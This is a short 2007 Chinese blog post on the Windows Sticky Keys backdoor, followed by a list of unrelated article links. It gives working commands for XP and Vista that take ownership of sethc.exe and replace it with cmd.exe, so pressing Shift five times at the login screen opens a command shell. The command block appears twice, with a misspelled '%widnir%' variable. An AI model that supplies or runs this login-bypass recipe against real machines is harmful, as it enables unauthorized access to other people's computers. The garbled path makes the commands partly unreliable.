WINDOWS漏洞:粘置键
更新时间:2007年04月23日 00:00:00 作者:
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
相关文章
输入gpedit.msc后提示找不到gpedit.msc的解决方法
在“运行”对话框中输入“gpedit.msc ”后,Windows 却提示“找不到该文件,无法运行”。2007-05-05
每个开 Blog 的兄弟都会时刻关注 Blog 上的留言,上次已经说道如何使用 Gtalk 追踪网站的留言。 在使用 Google 工具条时发现其实 Google 工具条本身也开放了 API 供用户调用。第一步要做的就是将用户留言做成 RSS 格式的输出(其实也就是 XML 格式,Wordpress 已经有这样的功能了)。2008-04-04
ghost.pif新变种导致杀毒软件0xc00000ba失败的解决方法
ghost.pif新变种导致杀毒软件0xc00000ba失败的解决方法...2007-07-07
非常完整全面的蓝屏代码解读...2007-02-02
Putty是最常用的远程登录工具和加密代理访问工具等,管理很多台服务器的时就有很多登录配置,当换机器的时候就成了一个问题。2008-04-04
下面的方法不太好,本站用的是[html]运行的内容[/html]就可以实现运行效果代码2008-01-01
用nero刻录可启动功能的光盘而且光盘不是iso格式的...2007-12-12
IE8引发 VS2005/2008 MFC向导出错的解决方案
IE正式版引发VS2005和VS2008向导出错的解决方案.这个是VC++团队给出的.2009-04-04
女士丝巾的打法图文示例2008-04-04
Vmware虚拟机的安装及配置方法...2007-11-11
最新评论